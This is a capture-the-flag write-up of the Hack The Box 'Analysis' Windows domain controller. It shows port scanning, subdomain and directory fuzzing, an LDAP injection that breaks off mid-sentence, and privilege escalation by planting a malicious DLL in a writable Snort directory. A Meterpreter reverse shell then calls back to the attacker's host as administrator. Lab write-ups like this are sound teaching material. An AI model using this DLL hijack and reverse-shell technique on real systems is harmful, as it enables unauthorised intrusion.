# Analysis
## Enumeration
```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ nmap -sC -sV -Pn 10.10.11.250
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 20:14 EST
Nmap scan report for analysis.htb (10.10.11.250)
Host is up (0.69s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-22 01:14:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -2s
| smb2-time:
| date: 2024-01-22T01:14:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.58 secon
```
DNS + http sounds like a great combination for subdomain fuzzing.
```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ gobuster dns -d analysis.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: analysis.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2024/01/21 20:18:24 Starting gobuster in DNS enumeration mode
===============================================================
Found: internal.analysis.htb
```
Upon loading the site, we get a 403 error forbidden. Time to brute force the directories and file path.
```bash
──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ ffuf -u http://internal.analysis.htb/users/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://internal.analysis.htb/users/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 98ms]
* FUZZ: list.php
[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 5ms]
* FUZZ: List.php
```
Visiting list.php, we get `missing parameter` and if we put a valid name we get back results!
LDAP injection
Judging from this columns, it seems that the `name` parameter is susceptible to LDAP injection.
After a long while, I disc\
\
## Privilege Escalation (Unintended)
We can perform a DLL hijacking based on having write-permissions in the `C:\Snort\lib\snort_dynamicpreprocessor` directory.
According to the `snort.conf` located in `C:\Snort\etc\` it defines the following
```bash
###################################################
# Step #4: Configure dynamic loaded libraries.
# For more information, see Snort Manual, Configuring Snort - Dynamic Modules
###################################################
# path to dynamic preprocessor libraries
dynamicpreprocessor directory C:\Snort\lib\snort_dynamicpreprocessor
# path to base preprocessor engine
dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll
# path to dynamic rules libraries
# dynamicdetection directory C:\Snort\lib\snort_dynamicrules
```
We can tell that snort is restarting on intervals as the snort log is getting updated.
Therefore, we can drop our malicious DLL named `sf_engine.dll` into the `C:\Snort\lib\snort_dynamicpreprocessor` directory.
After uploading our malicious DLL to the directory and running snort with the config file listed above, we see that our DLL is actually laoded with no shell sadly.
{% code overflow="wrap" %}
```bash
Evil-WinRM* PS C:\Snort\bin> ./snort.exe -c C:\Snort\etc\snort.conf
snort.exe : Running in IDS mode
+ CategoryInfo : NotSpecified: (Running in IDS mode:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
--== Initializing Snort ==--Initializing Output Plugins!Initializing Preprocessors!Initializing Plug-ins!Parsing Rules file "C:\Snort\etc\snort.conf"PortVar 'HTTP_PORTS' defined : [ 80:81 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]PortVar 'SHELLCODE_PORTS' defined : [ 0:79 81:65535 ]PortVar 'ORACLE_PORTS' defined : [ 1024:65535 ]PortVar 'SSH_PORTS' defined : [ 22 ]PortVar 'FTP_PORTS' defined : [ 21 2100 3535 ]PortVar 'SIP_PORTS' defined : [ 5060:5061 5600 ]PortVar 'FILE_DATA_PORTS' defined : [ 80:81 110 143 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]PortVar 'GTP_PORTS' defined : [ 2123 2152 3386 ]Detection: Search-Method = AC-Full-Q Split Any/Any group = enabled Search-Method-Optimizations = enabled Maximum pattern length = 20Tagged Packet Limit: 256Loading dynamic engine C:\Snort\lib\snort_dynamicengine\sf_engine.dll... doneLoading all dynamic preprocessor libs from C:\Snort\lib\snort_dynamicpreprocessor... Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dce2.dll... done Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dnp3.dll... done Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dns.dll... done Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_engine.dll...
```
{% endcode %}
However after awhile, my metrepeter listener manages to catch a privileged shell, presumably from the Adminstrator running the batch script to restart snort.
```bash
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] Sending stage (200774 bytes) to 10.10.11.250
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.11.250:65304) at 2024-01-21 19:59:11 -0500
meterpreter > shell
Process 15708 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
analysis\administrateur
```
